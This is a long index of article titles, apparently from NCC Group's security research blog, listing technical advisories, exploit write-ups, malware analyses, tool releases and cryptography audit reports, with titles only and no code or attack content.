* NETGEAR Routers: A Playground for Hackers?
* Real World Cryptography Conference 2023 – Part I
* Public Report – AWS Nitro System API & Security Claims
* State of DNS Rebinding in 2023
* Machine Learning 103: Exploring LLM Code Generation
* HITBAMS – Your Not so “Home” Office – Soho Hacking at Pwn2Own
* Public Report – Kubernetes 1.24 Security Audit
* Public Report – Solana Program Library ZK-Token Security Assessment
* Stepping Insyde System Management Mode
* Breaking Pedersen Hashes in Practice
* A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
* Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run
Payloads
* A Primer On Slowable Encoders
* Threat Spotlight – Hydra
* Rustproofing Linux (Part 4/4 Shared Memory)
* Rustproofing Linux (Part 3/4 Integer Overflows)
* Security Code Review With ChatGPT
* Rustproofing Linux (Part 2/4 Race Conditions)
* Readable Thrift
* Building WiMap the Wi-Fi Mapping Drone
* Fuzzing the Easy Way Using Zulu
* Exploiting CVE-2014-0282
* Rustproofing Linux (Part 1/4 Leaking Addresses)
* Machine Learning 102: Attacking Facial Authentication with Poisoned Data
* Threat Modelling Cloud Platform Services by Example: Google Cloud Storage
* Using Semgrep with Jupyter Notebook files
* Announcing NCC Group’s Cryptopals Guided Tour: Set 2
* Technical Advisory – U-Boot – Unchecked Download Size and Direction in USB
DFU (CVE-2022-2347)
* Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store
(CVE-2023-21433, CVE-2023-21434)
* Project Bishop: Clustering Web Pages
* Puckungfu: A NETGEAR WAN Command Injection
* MeshyJSON: A TP-Link tdpServer JSON Stack Overflow
* Machine Learning 101: The Integrity of Image (Mis)Classification?
* Replicating CVEs with KLEE
* Public Report – VPN by Google One Security Assessment
* Public Report – Confidential Space Security Review
* Exploring Prompt Injection Attacks
* Impersonating Gamers With GPT-2
* So long and thanks for all the 0day
* A jq255 Elliptic Curve Specification, and a Retrospective
* Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)
* Tool Release – Web3 Decoder Burp Suite Extension
* Tales of Windows detection opportunities for an implant framework
* Check out our new Microcorruption challenges!
* Toner Deaf – Printing your next persistence (Hexacon 2022)
* Technical Advisory – OpenJDK – Weak Parsing Logic in java.net.InetAddress and
Related Classes
* Public Report – IOV Labs powHSM Security Assessment
* Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and
CSF Tampering on NXP i.MX Devices
* A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a
ShadowPad intrusion
* Detecting Mimikatz with Busylight
* Whitepaper – Project Triforce: Run AFL On Everything (2017)
* Tool Release – Project Kubescout: Adding Kubernetes Support to Scout Suite
* Technical Advisory – Multiple Vulnerabilities in Juplink RX4-1800 WiFi Router
(CVE-2022-37413, CVE-2022-37414)
* A Guide to Improving Security Through Infrastructure-as-Code
* Tool Release – ScoutSuite 5.12.0
* Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter
Selection Review
* Tool Release – Monkey365
* Sharkbot is back in Google Play
* Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
* There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities
* Conference Talks – September/October 2022
* SETTLERS OF NETLINK: Exploiting a limited UAF in nf_tables (CVE-2022-32250)
* Writing FreeBSD Kernel Modules in Rust
* NCC Con Europe 2022 – Pwn2Own Austin Presentations
* Tool Release – JWT-Reauth
* Back in Black: Unlocking a LockBit 3.0 Ransomware Attack
* Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
* Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study
* Implementing the Castryck-Decru SIDH Key Recovery Attack in SageMath
* Top of the Pops: Three common ransomware entry techniques
* NCC Group Research at Black Hat USA 2022 and DEF CON 30
* Tool Release – insject: A Linux Namespace Injector
* Technical Advisory – Multiple vulnerabilities in Nuki smart locks
(CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507,
CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508,
CVE-2022-32505)
* NIST Selects Post-Quantum Algorithms for Standardization
* Climbing Mount Everest: Black-Byte Bytes Back?
* Five Essential Machine Learning Security Papers
* Whitepaper – Practical Attacks on Machine Learning Systems
* Flubot: the evolution of a notorious Android Banking Malware
* A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would
have prevented
* Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control
link
* Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities
in U-Boot (CVE-2022-30790, CVE-2022-30552)
* Understanding the Impact of Ransomware on Patient Outcomes – Do We Know
Enough?
* Public Report – Threshold ECDSA Cryptography Review
* Exception Handling and Data Integrity in Salesforce
* Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi
Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328,
CVE-2022-30329)
* Shining the Light on Black Basta
* Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790,
CVE-2022-30552)
* NCC Group’s Jeremy Boone recognized for Highest Quality and Most Eligible
Reports through the Intel Circuit Breaker program
* Conference Talks – June 2022
* Hardware Security By Design: ESP32 Guidance
* Public Report – Lantern and Replica Security Assessment
* NCC Group’s Juan Garrido named to Microsoft’s MSRC Office Security Researcher
Leaderboard
* Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 –
Unauthenticated Command Injection ( CVE-2022-31794 and CVE-2022-31795)
* Public Report – go-cose Security Assessment
* Technical Advisory – SerComm h500s – Authenticated Remote Command Execution
(CVE-2021-44080)
* Metastealer – filling the Racoon void
* earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s
decompiler internals to make automatic P-Code analysis scripts
* Tool Release – Ghostrings
* Technical Advisory – Kwikset/Weiser BLE Proximity Authentication in Kevo
Smart Locks Vulnerable to Relay Attacks
* Technical Advisory – Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to
Relay Attacks
* Technical Advisory – BLE Proximity Authentication Vulnerable to Relay Attacks
* Technical Advisory: Ruby on Rails – Possible XSS Vulnerability in ActionView
tag helpers (CVE-2022-27777)
* North Korea’s Lazarus: their initial access trade-craft using social media
and social engineering
* Adventures in the land of BumbleBee – a new malicious loader
* LAPSUS$: Recent techniques, tactics and procedures
* Real World Cryptography Conference 2022
* Mitigating the top 10 security threats to GCP using the CIS Google Cloud
Platform Foundation Benchmark
* A brief look at Windows telemetry: CIT aka Customer Interaction Tracker
* Public Report – Google Enterprise API Security Assessment
* Conti-nuation: methods and techniques observed in operations post the leaks
* Whitepaper – Double Fetch Vulnerabilities in C and C++
* Mining data from Cobalt Strike beacons
* Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
* Tool Release – ScoutSuite 5.11.0
* Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582)
* Microsoft announces the WMIC command is being retired, Long Live PowerShell
* SharkBot: a “new” generation Android banking Trojan being distributed on
Google Play Store
* Estimating the Bit Security of Pairing-Friendly Curves
* Detecting anomalous Vectored Exception Handlers on Windows
* BrokenPrint: A Netgear stack overflow
* Hardware & Embedded Systems: A little early effort in security can return a
huge payoff
* Public Report – O(1) Labs Mina Client SDK, Signature Library and Base
Components Cryptography and Implementation Review
* Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark
MC3224i printer (part 2)
* Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5
Attacks vs the CIS Microsoft 365 Foundation Benchmark
* Bypassing software update package encryption – extracting the Lexmark MC3224i
printer firmware (part 1)
* Detecting Karakurt – an extortion focused threat actor
* BAT: a Fast and Small Key Encapsulation Mechanism
* Testing Infrastructure-as-Code Using Dynamic Tooling
* Machine Learning for Static Analysis of Malware – Expansion of Research Scope
* 10 real-world stories of how we’ve compromised CI/CD pipelines
* NCC Group’s 2021 Annual Research Report
* On the malicious use of large language models like GPT-3
* Exploring the Security & Privacy of Canada’s Digital Proof of Vaccination
Programs
* Tool Update – ruby-trace: A Low-Level Tracer for Ruby
* Tool Release – shouganaiyo-loader: A Tool to Force JVM Attaches
* Technical Advisory – Lenovo ImController Local Privilege Escalation
(CVE-2021-3922, CVE-2021-3969)
* Choosing the Right MCU for Your Embedded Device — Desired Security Features
of Microcontrollers
* FPGAs: Security Through Obscurity?
* Public Report – WhatsApp opaque-ke Cryptographic Implementation Review
* log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228
* Log4Shell: Reconnaissance and post exploitation network detection
* Announcing NCC Group’s Cryptopals Guided Tour!
* Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Arbitrary
File Deletion
* Technical Advisory – SonicWall SMA 100 Series – Unauthenticated Stored XSS
* Technical Advisory – SonicWall SMA 100 Series – Multiple Unauthenticated
Heap-based and Stack-based Buffer Overflow (CVE-2021-20045)
* Technical Advisory – SonicWall SMA 100 Series – Post-Authentication Remote
Command Execution (CVE-2021-20044)
* Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow
(CVE-2021-20043)
* Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload
Path Traversal (CVE-2021-20040)
* Why IoT Security Matters
* Technical Advisory – Authenticated SQL Injection in SOAP Request in Broadcom
CA Network Flow Analysis (CVE-2021-44050)
* Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates
with the Half-Space-Trees Algorithm
* Tracking a P2P network related to TA505
* Conference Talks – December 2021
* Public Report – Zendoo Proof Verifier Cryptography Review
* An Illustrated Guide to Elliptic Curve Cryptography Validation
* Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks
* POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides
* Technical Advisory – Multiple Vulnerabilities in Victure WR1200 WiFi Router
(CVE-2021-43282, CVE-2021-43283, CVE-2021-43284)
* “We wait, because we know you.” Inside the ransomware negotiation economics.
* Detection Engineering for Kubernetes clusters
* Vaccine Misinformation Part 1: Misinformation Attacks as a Cyber Kill Chain
* Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA
Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568,
CVE-2021-43571)
* TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial
access
* Public Report – Zcash NU5 Cryptography Review
* The Next C Language Standard (C23)
* Conference Talks – November 2021
* Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833)
* Public Report – WhatsApp End-to-End Encrypted Backups Security Assessment
* Cracking RDP NLA Supplied Credentials for Threat Intelligence
* Detecting and Protecting when Remote Desktop Protocol (RDP) is open to the
Internet
* Enterprise-scale seamless onboarding and deployment of Azure Sentinel using
Lighthouse for multi-tenant environments
* Cracking Random Number Generators using Machine Learning – Part 2: Mersenne
Twister
* Cracking Random Number Generators using Machine Learning – Part 1:
xorshift128
* NCC Group placed first in global 5G Cyber Security Hack competition
* Paradoxical Compression with Verifiable Delay Functions
* A Look At Some Real-World Obfuscation Techniques
* SnapMC skips ransomware, steals data
* The Challenges of Fuzzing 5G Protocols
* Reverse engineering and decrypting CyberArk vault credential files
* Technical Advisory – Open5GS Stack Buffer Overflow During PFCP Session
Establishment on UPF (CVE-2021-41794)
* Assessing the security and privacy of Vaccine Passports
* Technical Advisory – NULL Pointer Derefence in McAfee Drive
Encryption (CVE-2021-23893)
* Conference Talks – October 2021
* Technical Advisory – Garuda Linux Insecure User Creation (CVE-2021-3784)
* Detecting and Hunting for the PetitPotam NTLM Relay Attack
* Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI
(CVE-2021-39307)
* Optimizing Pairing-Based Cryptography: Montgomery Multiplication in Assembly
* CertPortal: Building Self-Service Secure S/MIME Provisioning Portal
* NSA & CISA Kubernetes Security Guidance – A Critical Review
* Technical Advisory – New York State Excelsior Pass Vaccine Passport
Credential Forgery
* Technical Advisory – New York State Excelsior Pass Vaccine Passport Scanner
App Sends Data to a Third Party not Specified in Privacy Policy
* Conference Talks – September 2021
* The ABCs of NFC chip security
* CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2
* Disabling Office Macros to Reduce Malware Infections
* Some Musings on Common (eBPF) Linux Tracing Bugs
* Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive
Extraction – CVE-2021-22937 (Patch Bypass)
* Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection
(CVE-2021-36380)
* Practical Considerations of Right-to-Repair Legislation
* Technical Advisory – ICTFAX 7-4 – Indirect Object Reference
* Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log
Server (CVE-2021-35478,CVE-2021-35479)
* Detecting and Hunting for the Malicious NetFilter Driver
* CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1
* NCC Group Research at Black Hat USA 2021 and DEF CON 29
* Alternative Approaches for Fault Injection Countermeasures (Part 3/3)
* Software-Based Fault Injection Countermeasures (Part 2/3)
* An Introduction to Fault Injection (Part 1/3)
* Technical Advisory – Arbitrary File Read in Dell Wyse Management Suite
(CVE-2021-21586, CVE-2021-21587)
* Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare
vCenter Server 7.0
* Technical Advisory – Shop app sends pasteboard data to Shopify’s servers
* Tool Release – Reliably-checked String Library Binding
* Are you oversharing (in Salesforce)? Our new tool could sniff it out!
* Exploit mitigations: keeping up with evolving and complex software/hardware
* NCC Group co-signs the Electronic Frontier Foundation’s Statement on DMCA Use
Against Security Researchers
* Handy guide to a new Fivehands ransomware variant
* On the Use of Pedersen Commitments for Confidential Payments
* Incremental Machine Learning by Example: Detecting Suspicious Activity with
Zeek Data Streams, River, and JA3 Hashes
* Testing Two-Factor Authentication
* Optimizing Pairing-Based Cryptography: Montgomery Arithmetic in Rust
* Research Paper – Machine Learning for Static Malware Analysis, with
University College London
* Conference Talks – June 2021
* Public Report – Protocol Labs Groth16 Proof Aggregation: Cryptography and
Implementation Review
* iOS User Enrollment and Trusted Certificates
* Detecting Rclone – An Effective Tool for Exfiltration
* Supply Chain Security Begins with Secure Software Development
* Toxic Tokens: Using UUIDs for Authorization is Dangerous (even if they’re
cryptographically random)
* Public Report – Dell Secured Component Verification
* RM3 – Curiosities of the wildest banking malware
* Conference Talks – May 2021
* A Census of Deployed Pulse Connect Secure (PCS) Versions
* NCC Group’s Upcoming Trainings at Black Hat USA 2021
* Public Report – VPN by Google One: Technical Security & Privacy Assessment
* Technical Advisory – ParcelTrack sends all pasteboard data to ParcelTrack’s
servers on startup
* Tool Release – Principal Mapper v1.1.0 Update
* SAML XML Injection
* The Future of C Code Review
* RIFT: Detection capabilities for recent F5 BIG-IP/BIG-IQ iControl REST API
vulnerabilities CVE-2021-22986
* Tool Release – Solitude: A privacy analysis tool
* Deception Engineering: exploring the use of Windows Installer Packages
against first stage payloads
* Lending a hand to the community – Covenant v0.7 Updates
* Technical Advisory: Dell SupportAssist Local Privilege Escalation
(CVE-2021-21518)
* Technical Advisory – Multiple Vulnerabilities in Netgear ProSAFE Plus
JGS516PE / GS116Ev2 Switches
* Deception Engineering: exploring the use of Windows Service Canaries against
ransomware
* Wubes: Leveraging the Windows 10 Sandbox for Arbitrary Processes
* Technical Advisory: Administrative Passcode Recovery and Authenticated Remote
Buffer Overflow Vulnerabilities in Gigaset DX600A Handset (CVE-2021-25309,
CVE-2021-25306)
* Cryptopals: Exploiting CBC Padding Oracles
* Investigating Potential Security Vulnerability Manifestation through Various
Analyses & Inferences Regarding Internet RFCs (and how RFC Security might be
Improved)
* NCC Group’s 2020 Annual Research Report
* Conference Talks – February/March 2021
* Software Verification and Analysis Using Z3
* Technical Advisory – Linksys WRT160NL – Authenticated Command Injection
(CVE-2021-25310)
* Real World Cryptography Conference 2021: A Virtual Experience
* RIFT: Analysing a Lazarus Shellcode Execution Method
* MSSQL Lateral Movement
* Public Report – BLST Cryptographic Implementation Review
* Sign over Your Hashes – Stealing NetNTLM Hashes via Outlook Signatures
* Abusing cloud services to fly under the radar
* Building an RDP Credential Catcher for Threat Intelligence
* Double-odd Elliptic Curves
* Using AWS and Azure for Cost Effective Log Ingestion with Data Processing
Pipelines for SIEMs
* Domestic IoT Nightmares: Smart Doorbells
* Technical Advisory: OS Command Injection in Silver Peak EdgeConnect
Appliances (CVE-2020-12148, CVE-2020-12149)
* Helping Engineering Teams Tackle Security Debt in Embedded Systems: U-Boot
Configuration Auditing Introduced in Depthcharge v0.2.0
* An Adventure in Contingency Debugging: Ruby IO#read/IO#write Considered
Harmful
* ABSTRACT SHIMMER (CVE-2020-15257): Host Networking is root-Equivalent, Again
* Tool Release – HTTPSignatures: A Burp Suite Extension Implementing HTTP
Signatures
* ICS/OT Security & the evolution of the Purdue Model: Integrating Industrial
and Business Networks
* Tool Release – Carnivore: Microsoft External Assessment Tool
* Technical Advisory: containerd – containerd-shim API Exposed to Host Network
Containers (CVE-2020-15257)
* Conference Talks – December 2020
* TA505: A Brief History Of Their Time
* Decrypting OpenSSH sessions for fun and profit
* Past, Present and Future of Effective C
* Technical Advisory: SQL Injection and Reflected Cross-Site Scripting (XSS)
Vulnerabilities in Oracle Communications Diameter Signaling Router
(CVE-2020-14787, CVE-2020-14788)
* Technical Advisory: Command Injection
* Conference Talks – November 2020
* Technical Advisory: Pulse Connect Secure – Arbitrary File Read via Logon
Message (CVE-2020-8255)
* Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Gzip
Extraction (CVE-2020-8260)
* Technical Advisory – Jitsi Meet Electron – Arbitrary Client Remote Code
Execution (CVE-2020-27162)
* Technical Advisory – Jitsi Meet Electron – Limited Certificate Validation
Bypass (CVE-2020-27161)
* Public Report – Filecoin Bellman and BLS Signatures Cryptographic Review
* Technical Advisory – Linksys WRT160NL – Authenticated Remote Buffer Overflow
(CVE-2020-26561)
* There’s A Hole In Your SoC: Glitching The MediaTek BootROM
* RIFT: F5 CVE-2020-5902 and Citrix CVE-2020-8193, CVE-2020-8195 and
CVE-2020-8196 honeypot data release
* Technical Advisory – Pulse Connect Secure – RCE via Template Injection
(CVE-2020-8243)
* Tool – Windows Executable Memory Page Delta Reporter
* Salesforce Security with Remote Working
* Tool Release – ScoutSuite 5.10
* Conference Talks – October 2020
* Tool Release – ICPin, an integrity-check and anti-debug detection pintool
* Faster Modular Inversion and Legendre Symbol, and an X25519 Speed Record
* Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP
Method Interchange (CVE-2020-13658)
* Online Casino Roulette – A guideline for penetration testers and security
researchers
* Extending a Thinkst Canary to become an interactive honeypot
* StreamDivert: Relaying (specific) network connections
* Public Report – Electric Coin Company NU4 Cryptographic Specification and
Implementation Review
* Machine learning from idea to reality: a PowerShell case study
* Conference Talks – September 2020
* Whitepaper – Exploring the Security of KaiOS Mobile Applications
* Technical Advisory – wolfSSL TLS 1.3 Client Man-in-the-Middle Attack
(CVE-2020-24613)
* Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS
Pre-installed Mobile Applications
* Technical Advisory – FreePBX – Multiple Authenticated SQL Injections in UCP
application
* Immortalising 20 Years of Epic Research
* Pairing over BLS12-381, Part 3: Pairing!
* Public Report – Pixel 4/4XL and Pixel 4a ioXt Audit
* NCC Group researchers named amongst MSRC’s Most Valuable Security Researchers
in 2020
* Lights, Camera, HACKED! An insight into the world of popular IP Cameras
* Conference Talks – August 2020
* Tool Release – Winstrument: An Instrumentation Framework for Windows
Application Assessments
* Tool Release: Sinking U-Boots with Depthcharge
* Technical Advisory: Heartbleed chained with a Pass-the-Hash attack leads to
device compromise on TP-Link C200 IP Camera
* Public Report – Qredo Apache Milagro MPC Cryptographic Assessment
* Pairing over BLS12-381, Part 2: Curves
* Understanding the root cause of F5 Networks K52145254: TMUI RCE vulnerability
CVE-2020-5902
* RIFT: Citrix ADC Vulnerabilities CVE-2020-8193, CVE-2020-8195 and
CVE-2020-8196 Intelligence
* An offensive guide to the Authorization Code grant
* Technical Advisory – KwikTag Web Admin Authentication Bypass
* Pairing over BLS12-381, Part 1: Fields
* RIFT: F5 Networks K52145254: TMUI RCE vulnerability CVE-2020-5902
Intelligence
* Experiments in Extending Thinkst Canary – Part 1
* Tool Release – ScoutSuite 5.9.0
* Technical Advisory – macOS Installer Local Root Privilege Escalation
(CVE-2020-9817)
* Paper: Thematic for Success in Real-World Offensive Cyber Operations – How to
make threat actors work harder and fail more often
* How-to: Importing WStalker CSV (and more) into Burp Suite via Import to
Sitemap Extension
* Tool: WStalker – an easy proxy to support Web API assessments
* Security Considerations of zk-SNARK Parameter Multi-Party Computation
* WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group
* Tool Release – Socks Over RDP Now Works With Citrix
* Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability
* Technical Advisory – ARM MbedOS USB Mass Storage Driver Memory Corruption
* Cyber Security of New Space Paper
* In-depth analysis of the new Team9 malware family
* Common Insecure Practices with Configuring and Extending Salesforce
* Exploring DeepFake Capabilities & Mitigation Strategies with University
College London
* Game Security
* Exploring macOS Calendar Alerts: Part 2 – Exfiltrating data (CVE-2020-3882)
* Research Report – Zephyr and MCUboot Security Assessment
* CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a
better read/write primitive
* CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read
and write primitive
* Using SharePoint as a Phishing Platform
* Public Report – Coda Cryptographic Review
* Shell Arithmetic Expansion and Evaluation Abuse
* CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition
and debugging tricks
* Tool Release – Socks Over RDP
* Exploring macOS Calendar Alerts: Part 1 – Attempting to execute code
* CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic
triggering
* Practical Machine Learning for Random (Filename) Detection
* Curve9767 and Fast Signature Verification
* CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction
* The Extended AWS Security Ramp-Up Guide
* Code Patterns for API Authorization: Designing for Security
* Order Details Screens and PII
* How cryptography is used to monitor the spread of COVID-19
* Rise of the Sensors: Securing LoRaWAN Networks
* C Language Standards Update – Zero-size Reallocations are Undefined Behavior
* IETF Draft: Indicators of Compromise and Their Role in Attack and Defen[c|s]e
* Exploring Verifiable Random Functions in Code
* Crave the Data: Statistics from 1,300 Phishing Campaigns
* Impact of DNS over HTTPS (DoH) on DNS Rebinding Attacks
* Tool Release – ScoutSuite 5.8.0
* Whitepaper – Coinbugs: Enumerating Common Blockchain Implementation-Level
Vulnerabilities
* Smart Contracts Inside SGX Enclaves: Common Security Bug Patterns
* LDAPFragger: Bypassing network restrictions using LDAP attributes
* Threat Actors: exploiting the pandemic
* A Survey of Istio’s Network Security Features
* Conference Talks – March 2020
* Public Report – RustCrypto AES/GCM and ChaCha20+Poly1305 Implementation
Review
* Reviewing Verifiable Random Functions
* CVE-2018-8611 – Diving into the Windows Kernel Transaction Manager (KTM) for
fun and exploitation
* Whitepaper – Microcontroller Readback Protection: Bypasses and Defenses
* Improving Software Security through C Language Standards
* Whitepaper – A Tour of Curve 25519 in Erlang
* Deep Dive into Real-World Kubernetes Threats
* Technical Advisory – playSMS Pre-Authentication Remote Code Execution
(CVE-2020-8644)
* Interfaces.d to RCE
* Properly Signed Certificates on CPE Devices
* Conference Talks – February 2020
* Tool Release – Collaborator++
* Public Report – Electric Coin Company NU3 Specification and Blossom
Implementation Audit
* Tool Release – Enumerating Docker Registries with go-pillage-registries
* Conference Talks – January 2020
* Passive Decryption of Ethereum Peer-to-Peer Traffic
* On Linux’s Random Number Generation
* Demystifying AWS’ AssumeRole and sts:ExternalId
* Welcome to the new NCC Group Global Research blog
* Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet;
and Unprotected client and server data transmission between Android and IOS
clients
* Security impact of IoT on the Enterprise
* Secure Device Provisioning Best Practices: Heavy Truck Edition
* CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device
Host Service and the Update Orchestrator Service
* Padding the struct: How a compiler optimization can disclose stack memory
* Embedded Device Security Certifications
* An Introduction to Ultrasound Security Research
* PhanTap (Phantom Tap): Making networks spookier one packet at a time
* An Introduction to Quantum Computing for Security Professionals
* Sniffle: A Sniffer for Bluetooth 5
* Compromising a Hospital Network for £118 (Plus Postage & Packaging)
* Getting Shell with XAMLX Files
* Kerberos Resource-Based Constrained Delegation: When an Image Change Leads to
a Privilege Escalation
* Technical Advisory: CyberArk EPM Non-paged Pool Buffer Overflow
* Technical Advisory: Unauthenticated SQL Injection in Lansweeper
* Jenkins Plugins and Core Technical Summary Advisory
* Technical Advisory: Multiple Vulnerabilities in Ricoh Printers
* Technical Advisory: Multiple Vulnerabilities in Brother Printers
* Technical Advisory: Multiple Vulnerabilities in Xerox Printers
* Technical Advisory: Multiple Vulnerabilities in Kyocera Printers
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 10: Efficacy Demonstration, Project Conclusion and
Next Steps
* Technical Advisory: Multiple Vulnerabilities in HP Printers
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 9: Adventures with Expert Systems
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 8: Development of Prototype #4 – Building on
Takaesu’s Approach with Focus on XSS
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 7: Development of Prototype #3 – Adventures in
Anomaly Detection
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 6: Development of Prototype #2 – Creating a SQLi PoC
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 5: Development of Prototype #1 – Text Processing and
Semantic Relationships
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 4: Architecture and Design
* Technical Advisory – Authorization Bypass Allows for Pinboard Corruption
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 3: Understanding Existing Approaches and Attempts
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 2: Going off on a Tangent – AI/ML Applications in
Social Engineering
* Project Ava: On the Matter of Using Machine Learning for Web Application
Security Testing – Part 1: Understanding the Basics and What Platforms and
Frameworks Are Available
* Technical Advisory: Multiple Vulnerabilities in Lexmark Printers
* Technical Advisory: Intel Driver Support & Assistance – Local Privilege
Escalation
* Technical Advisory: Citrix Workspace / Receiver Remote Code Execution
Vulnerability
* The Sorry State of Aftermarket Head Unit Security
* Cyber Security in UK Agriculture
* NCC Group Connected Health Whitepaper July 2019
* Story of a Hundred Vulnerable Jenkins Plugins
* Whitepaper – Hardware-Backed Heist: Extracting ECDSA Keys from Qualcomm’s
TrustZone
* Technical Advisory: Multiple Vulnerabilities in SmarterMail
* Technical Advisory – DelTek Vision – Arbitrary SQL Execution (SQLi)
* eBPF Adventures: Fiddling with the Linux Kernel and Unix Domain Sockets
* Chafer backdoor analysis
* Finding and Exploiting .NET Remoting over HTTP using Deserialisation
* Technical Advisory: Multiple Vulnerabilities in MailEnable
* Assessing Unikernel Security
* Technical Advisory: IP Office Stored Cross Site Scripting (XSS) Vulnerability
* Zcash Overwinter Consensus and Sapling Cryptography Review
* Xendbg: A Full-Featured Debugger for the Xen Hypervisor
* Use of Deserialisation in .NET Framework Methods and Classes
* Owning the Virgin Media Hub 3.0: The perfect place for a backdoor
* Nine years of bugs at NCC Group
* The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations
* Third party assurance
* Turla PNG Dropper is back
* Public cloud
* Android Cloud Backup/Restore
* Spectre on a Television
* RokRat Analysis
* Technical Advisory: SMB Hash Hijacking and User Tracking in MS Outlook
* Technical Advisory: Authentication Bypass in libSSH
* Securing Google Cloud Platform – Ten best practices
* Public Report – Android Cloud Backup/Restore
* Much Ado About Hardware Implants
* NCC Group’s Exploit Development Capability: Why and What
* Technical Advisory: Bypassing Workflows Protection Mechanisms – Remote Code
Execution on SharePoint
* Technical Advisory: Mosquitto Broker DoS through a Memory Leak vulnerability
* Improving Your Embedded Linux Security Posture With Yocto
* How I did not get a shell
* Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw
* Singularity of Origin
* Proxy Re-Encryption Protocol: IronCore Public Report
* Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms
using Deserialisation of Untrusted Data
* Celebrating NCC Con Europe 2018
* The disadvantages of a blacklist-based approach to input validation
* Securing Teradata Database
* Technical Advisory: Unauthenticated Remote Command Execution through Multiple
Vulnerabilities in Virgin Media Hub 3.0
* Ethics in Security Testing
* Freddy: An extension for automatically identifying deserialisation issues in
Java and .NET applications
* Sobelow Update
* House
* Principal Mapper (pmapper)
* Return of the hidden number problem
* Technical advisory: “ROHNP”- key extraction side channel in multiple crypto
libraries
* CVE-2017-8570 RTF and the Sisfader RAT
* Mallory: Transparent TCP and UDP Proxy
* Mallory and Me: Setting up a Mobile Mallory Gateway
* CyberVillainsCA
* DECTbeacon
* Fuzzbox
* Gizmo
* HTTP Profiler
* Intent Sniffer
* Intent Fuzzer
* iSEC Partners Releases SSLyze
* Jailbreak
* Manifest Explorer
* Package Play
* ProxMon
* pySimReader
* SAML Pummel
* SecureBigIP
* SecureCisco
* SecureCookies
* SecureIE.ActiveX
* WebRATS
* AWS Inventory: A tool for mapping AWS resources
* Extractor
* CMakerer: A small tool to aid CLion’s indexing
* Emissary Panda – A potential new malicious tool
* SMB hash hijacking & user tracking in MS Outlook
* Testing HTTP/2 only web services
* Windows IPC Fuzzing Tools
* WSBang
* WSMap
* Nerve
* Ragweed
* File Fuzzers
* Kivlad
* Android SSL Bypass
* Hiccupy
* iOS SSL Killswitch
* The SSL Conservatory
* TLSPretense — SSL/TLS Client Testing Framework
* tcpprox
* YoNTMA
* Tattler
* PeachFarmer
* Android-KillPermAndSigChecks
* Android-OpenDebug
* Android-SSL-TrustKiller
